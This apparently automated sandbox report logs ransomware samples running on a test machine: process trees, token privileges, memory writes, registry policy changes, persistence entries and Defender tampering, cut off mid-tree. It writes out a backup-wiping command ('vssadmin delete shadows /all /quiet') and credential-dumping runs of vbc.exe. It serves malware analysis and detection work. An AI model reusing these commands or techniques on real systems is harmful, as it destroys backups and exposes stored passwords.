pid Process 2672 Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe 1288 Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 2756 7zFM.exe Token: 35 2756 7zFM.exe Token: SeSecurityPrivilege 2756 7zFM.exe Token: SeDebugPrivilege 2312 taskmgr.exe Token: SeBackupPrivilege 4572 vssvc.exe Token: SeRestorePrivilege 4572 vssvc.exe Token: SeAuditPrivilege 4572 vssvc.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeSecurityPrivilege 2544 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeDebugPrivilege 1648 Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe Token: SeDebugPrivilege 1788 Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe Token: SeIncreaseQuotaPrivilege 3800 WMIC.exe Token: SeSecurityPrivilege 3800 WMIC.exe Token: SeTakeOwnershipPrivilege 3800 WMIC.exe Token: SeLoadDriverPrivilege 3800 WMIC.exe Token: SeSystemProfilePrivilege 3800 WMIC.exe Token: SeSystemtimePrivilege 3800 WMIC.exe Token: SeProfSingleProcessPrivilege 3800 WMIC.exe Token: SeIncBasePriorityPrivilege 3800 WMIC.exe Token: SeCreatePagefilePrivilege 3800 WMIC.exe Token: SeBackupPrivilege 3800 WMIC.exe Token: SeRestorePrivilege 3800 WMIC.exe Token: SeShutdownPrivilege 3800 WMIC.exe Token: SeDebugPrivilege 3800 WMIC.exe Token: SeSystemEnvironmentPrivilege 3800 WMIC.exe Token: SeRemoteShutdownPrivilege 3800 WMIC.exe Token: SeUndockPrivilege 3800 WMIC.exe Token: SeManageVolumePrivilege 3800 WMIC.exe Token: 33 3800 WMIC.exe Token: 34 3800 WMIC.exe Token: 35 3800 WMIC.exe Token: SeShutdownPrivilege 664 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 664 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 664 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 664 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 664 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 664 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 664 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 664 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 664 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 664 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 664 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 664 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Token: SeShutdownPrivilege 664 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2756 7zFM.exe 2756 7zFM.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe 2312 taskmgr.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 2888 Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe 540 Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe 484 Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe 1828 Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe 2684 xk.exe 3784 IExplorer.exe 4220 WINLOGON.EXE 3112 Windows Update.exe 4216 CSRSS.EXE 4960 SERVICES.EXE 2944 LSASS.EXE 4672 SMSS.EXE 3768 shell.exe 6088 shell.exe 2680 shell.exe 6580 shell.exe 6576 shell.exe 4408 shell.exe 3132 shell.exe 4740 shell.exe 5980 shell.exe 3396 shell.exe 4604 shell.exe 6396 shell.exe 6268 shell.exe 2604 shell.exe 6844 shell.exe 5388 shell.exe 3684 shell.exe 4164 shell.exe 3708 shell.exe 6364 shell.exe 6016 shell.exe 4768 shell.exe 5096 xk.exe 6992 shell.exe 4232 shell.exe 4588 shell.exe 5776 shell.exe 2680 shell.exe 4676 shell.exe 6420 shell.exe 6580 shell.exe 5880 shell.exe 5452 IExplorer.exe 3292 shell.exe 3968 shell.exe 5400 shell.exe 6684 shell.exe 6964 shell.exe 2936 shell.exe 2092 shell.exe 6556 shell.exe 6328 shell.exe 6956 WINLOGON.EXE 7112 shell.exe 2400 shell.exe 6772 shell.exe 4540 shell.exe 2632 shell.exe 3192 iexplore.exe 3192 iexplore.exe 6520 shell.exe 4044 CSRSS.EXE -
Suspicious use of UnmapMainImage 3 IoCs
pid Process 2192 Trojan-Ransom.Win32.Shade.pfi-2b703b07e6eba207d2e29360e1f5b48d2d75c0c7d927d2cce973204021188b82.exe 4600 Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe 6848 Windows Update.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2964 wrote to memory of 2040 2964 cmd.exe 36 PID 2964 wrote to memory of 2040 2964 cmd.exe 36 PID 2964 wrote to memory of 2040 2964 cmd.exe 36 PID 2964 wrote to memory of 2040 2964 cmd.exe 36 PID 2964 wrote to memory of 2888 2964 cmd.exe 37 PID 2964 wrote to memory of 2888 2964 cmd.exe 37 PID 2964 wrote to memory of 2888 2964 cmd.exe 37 PID 2964 wrote to memory of 2888 2964 cmd.exe 37 PID 2964 wrote to memory of 540 2964 cmd.exe 38 PID 2964 wrote to memory of 540 2964 cmd.exe 38 PID 2964 wrote to memory of 540 2964 cmd.exe 38 PID 2964 wrote to memory of 540 2964 cmd.exe 38 PID 2964 wrote to memory of 2900 2964 cmd.exe 39 PID 2964 wrote to memory of 2900 2964 cmd.exe 39 PID 2964 wrote to memory of 2900 2964 cmd.exe 39 PID 2964 wrote to memory of 2900 2964 cmd.exe 39 PID 2964 wrote to memory of 2936 2964 cmd.exe 40 PID 2964 wrote to memory of 2936 2964 cmd.exe 40 PID 2964 wrote to memory of 2936 2964 cmd.exe 40 PID 2964 wrote to memory of 2936 2964 cmd.exe 40 PID 2964 wrote to memory of 484 2964 cmd.exe 41 PID 2964 wrote to memory of 484 2964 cmd.exe 41 PID 2964 wrote to memory of 484 2964 cmd.exe 41 PID 2964 wrote to memory of 484 2964 cmd.exe 41 PID 2964 wrote to memory of 1928 2964 cmd.exe 42 PID 2964 wrote to memory of 1928 2964 cmd.exe 42 PID 2964 wrote to memory of 1928 2964 cmd.exe 42 PID 2964 wrote to memory of 1928 2964 cmd.exe 42 PID 2964 wrote to memory of 2028 2964 cmd.exe 43 PID 2964 wrote to memory of 2028 2964 cmd.exe 43 PID 2964 wrote to memory of 2028 2964 cmd.exe 43 PID 2964 wrote to memory of 2028 2964 cmd.exe 43 PID 2964 wrote to memory of 1940 2964 cmd.exe 44 PID 2964 wrote to memory of 1940 2964 cmd.exe 44 PID 2964 wrote to memory of 1940 2964 cmd.exe 44 PID 2964 wrote to memory of 1940 2964 cmd.exe 44 PID 2964 wrote to memory of 1828 2964 cmd.exe 45 PID 2964 wrote to memory of 1828 2964 cmd.exe 45 PID 2964 wrote to memory of 1828 2964 cmd.exe 45 PID 2964 wrote to memory of 1828 2964 cmd.exe 45 PID 2964 wrote to memory of 1260 2964 cmd.exe 46 PID 2964 wrote to memory of 1260 2964 cmd.exe 46 PID 2964 wrote to memory of 1260 2964 cmd.exe 46 PID 2964 wrote to memory of 1260 2964 cmd.exe 46 PID 2964 wrote to memory of 1648 2964 cmd.exe 47 PID 2964 wrote to memory of 1648 2964 cmd.exe 47 PID 2964 wrote to memory of 1648 2964 cmd.exe 47 PID 2964 wrote to memory of 1648 2964 cmd.exe 47 PID 2964 wrote to memory of 2116 2964 cmd.exe 48 PID 2964 wrote to memory of 2116 2964 cmd.exe 48 PID 2964 wrote to memory of 2116 2964 cmd.exe 48 PID 2964 wrote to memory of 2116 2964 cmd.exe 48 PID 2964 wrote to memory of 1652 2964 cmd.exe 49 PID 2964 wrote to memory of 1652 2964 cmd.exe 49 PID 2964 wrote to memory of 1652 2964 cmd.exe 49 PID 2964 wrote to memory of 1652 2964 cmd.exe 49 PID 2964 wrote to memory of 1988 2964 cmd.exe 50 PID 2964 wrote to memory of 1988 2964 cmd.exe 50 PID 2964 wrote to memory of 1988 2964 cmd.exe 50 PID 2964 wrote to memory of 1988 2964 cmd.exe 50 PID 2964 wrote to memory of 1788 2964 cmd.exe 51 PID 2964 wrote to memory of 1788 2964 cmd.exe 51 PID 2964 wrote to memory of 1788 2964 cmd.exe 51 PID 2964 wrote to memory of 1788 2964 cmd.exe 51 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions = "1" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 12 IoCs
pid Process 2248 attrib.exe 5904 attrib.exe 3120 attrib.exe 5284 attrib.exe 3688 attrib.exe 3864 attrib.exe 1872 attrib.exe 5856 attrib.exe 2844 attrib.exe 6364 attrib.exe 3528 attrib.exe 3368 attrib.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00361.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2756
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2312
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.gibz-eb53d5e2ac26d3f5bd2c4c0d58670a5171197e1e7cc797004612f8801da1aa68.exeTrojan-Ransom.Win32.Blocker.gibz-eb53d5e2ac26d3f5bd2c4c0d58670a5171197e1e7cc797004612f8801da1aa68.exe2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2040 -
C:\Windows\SysWOW64\Rundll32.exe"C:\Windows\System32\Rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\IconCache.db",StartUpdate3⤵PID:408
-
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exeTrojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe2⤵
- Modifies WinLogon for persistence
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Disables RegEdit via registry modification
- Executes dropped EXE
- Loads dropped DLL
- Modifies system executable filetype association
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:2888 -
C:\Windows\xk.exeC:\Windows\xk.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2684
-
-
C:\Windows\SysWOW64\IExplorer.exeC:\Windows\system32\IExplorer.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3784
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4220
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4216
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4960
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2944
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4672
-
-
C:\Windows\xk.exeC:\Windows\xk.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5096
-
-
C:\Windows\SysWOW64\IExplorer.exeC:\Windows\system32\IExplorer.exe3⤵
- Suspicious use of SetWindowsHookEx
PID:5452
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"3⤵
- Suspicious use of SetWindowsHookEx
PID:6956
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"3⤵
- Suspicious use of SetWindowsHookEx
PID:4044
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"3⤵PID:1920
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"3⤵PID:4308
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"3⤵PID:3624
-
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exeTrojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:540 -
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exeTrojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe3⤵
- Executes dropped EXE
PID:3928
-
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldcq-c1da3cbf2c15cb64fb21ee704fedca797bf0f36ee2107015bb5625f0e8dd377b.exeTrojan-Ransom.Win32.Blocker.ldcq-c1da3cbf2c15cb64fb21ee704fedca797bf0f36ee2107015bb5625f0e8dd377b.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2900
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.liwq-a8c1bc0154b82490d3e19ebd3b4cfecb77aad4a5a05106255f69ded514be7ad7.exeTrojan-Ransom.Win32.Blocker.liwq-a8c1bc0154b82490d3e19ebd3b4cfecb77aad4a5a05106255f69ded514be7ad7.exe2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2936
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exeTrojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:484 -
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exerojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of UnmapMainImage
PID:4600 -
C:\Users\Admin\AppData\Roaming\Windows Update.exe"C:\Users\Admin\AppData\Roaming\Windows Update.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:3112 -
C:\Users\Admin\AppData\Roaming\Windows Update.exeC:\Users\Admin\AppData\Roaming\Windows Update.exe"5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of UnmapMainImage
PID:6848 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"6⤵PID:5364
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"6⤵PID:7440
-
-
-
-
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exeTrojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
PID:1928 -
C:\Windows\405066960303840\winsvcs.exeC:\Windows\405066960303840\winsvcs.exe3⤵
- Modifies Windows Defender Real-time Protection settings
- Windows security bypass
- Executes dropped EXE
- Windows security modification
PID:4156
-
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exeTrojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
PID:2028 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"3⤵PID:1876
-
C:\Windows\system32\mode.commode con cp select=12514⤵PID:1400
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:1640
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"3⤵PID:3400
-
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exeTrojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1940 -
